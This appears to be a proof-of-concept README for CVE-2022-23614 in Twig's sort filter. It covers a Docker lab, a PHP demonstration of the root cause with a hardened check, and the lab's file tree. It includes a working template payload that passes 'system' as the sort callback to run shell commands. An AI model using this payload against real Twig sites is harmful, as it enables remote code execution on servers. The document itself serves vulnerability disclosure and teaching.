# CVE-2022-23614
PoC for [CVE-2022-23614](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23614), [GHSA-5mv2-rx3q-4w2v](https://github.com/twigphp/Twig/security/advisories/GHSA-5mv2-rx3q-4w2v) (Twig sort filter code execution/sandbox bypass)
As seen in this commit - [https://github.com/twigphp/Twig/commit/..](https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9), Twig was passing a user-supplied function name as the callback parameter to [uasort](https://www.php.net/manual/en/function.uasort.php) ([here](https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9#diff-29e85e483c6ec4a9c2fd144820b6722c86df60d54175b355d85e806253313c1aR940)), which leads to arbitrary code execution.
To build and run the Docker container with a vulnerable Twig version:
```BASH
$ ./build-docker.sh
```
Open the web page at localhost:1337 and try rendering the following payload:
```Twig
{{ ['id','']|sort('system') }}
```
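The root cause in isolation, as an added example (not code from this repository or from Twig): `uasort()` accepts any PHP callable, including a function name given as a string, so a template-controlled string reaches a function call. `probe`, `sort_unchecked` and `sort_checked` are hypothetical names, and the Closure-only check is a simplified form of the mitigation.

```php
<?php
declare(strict_types=1);

// Harmless stand-in for a built-in function: it only counts its invocations.
// (Constructed for this example; it is referenced by name, as a string.)
$probeCalls = 0;
function probe(string $a, string $b): int
{
    $GLOBALS['probeCalls']++;
    return strcmp($a, $b);
}

// Simplified pre-fix behaviour: the value supplied by the template is handed
// straight to uasort(), which resolves a string to the function of that name.
function sort_unchecked(array $items, $arrow = null): array
{
    if ($arrow === null) {
        asort($items);
    } else {
        uasort($items, $arrow);
    }
    return $items;
}

// Hardened form: when templates are untrusted (sandboxed), accept only a
// Closure, which is what an arrow function written in a template compiles to.
function sort_checked(array $items, $arrow = null, bool $sandboxed = true): array
{
    if ($arrow !== null && $sandboxed && !$arrow instanceof \Closure) {
        throw new \InvalidArgumentException('sort callback must be a Closure in sandbox mode');
    }
    return sort_unchecked($items, $arrow);
}

// 1. The string 'probe' is resolved and called by uasort().
sort_unchecked(['x', 'y'], 'probe');
printf("unchecked: probe() was invoked %d time(s)\n", $probeCalls);

// 2. The same input is rejected before uasort() ever sees it.
try {
    sort_checked(['x', 'y'], 'probe');
} catch (\InvalidArgumentException $e) {
    printf("checked: rejected (%s)\n", $e->getMessage());
}

// 3. A genuine closure still sorts normally.
print_r(sort_checked(['b' => 2, 'a' => 1], fn (int $l, int $r): int => $l <=> $r));
```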

```
[4.0K] /data/pocs/3ad2b6a2c969c83e95c2c017a1dc85bc0f251543
├── [ 112] build-docker.sh
├── [4.0K] config
│   ├── [2.6K] httpd.conf
│   └── [ 272] supervisord.conf
├── [ 818] Dockerfile
├── [4.0K] example
│   ├── [4.0K] bin
│   │   └── [1.3K] console
│   ├── [1.6K] composer.json
│   ├── [ 85K] composer.lock
│   ├── [4.0K] config
│   │   ├── [ 239] bundles.php
│   │   ├── [4.0K] packages
│   │   │   ├── [ 687] cache.yaml
│   │   │   ├── [ 526] framework.yaml
│   │   │   ├── [4.0K] prod
│   │   │   │   └── [  57] routing.yaml
│   │   │   ├── [ 254] routing.yaml
│   │   │   ├── [4.0K] test
│   │   │   │   ├── [  85] framework.yaml
│   │   │   │   └── [  33] twig.yaml
│   │   │   └── [  77] twig.yaml
│   │   ├── [4.0K] routes
│   │   │   └── [4.0K] dev
│   │   │       └── [  98] framework.yaml
│   │   ├── [ 162] routes.yaml
│   │   └── [ 899] services.yaml
│   ├── [1.0K] LICENSE
│   ├── [4.0K] public
│   │   ├── [ 839] index.php
│   │   └── [4.0K] static
│   │       ├── [4.0K] css
│   │       ├── [4.0K] images
│   │       └── [4.0K] js
│   ├── [4.0K] src
│   │   ├── [4.0K] Controller
│   │   │   └── [ 725] DefaultController.php
│   │   ├── [1.4K] Kernel.php
│   │   └── [4.0K] Service
│   │       └── [ 390] TemplateGenerator.php
│   ├── [4.1K] symfony.lock
│   └── [4.0K] templates
│       └── [4.0K] site
│           └── [ 526] index.html
├── [4.0K] images
│   ├── [ 16K] result.png
│   └── [ 24K] webpage.png
└── [1.0K] README.md

20 directories, 28 files
```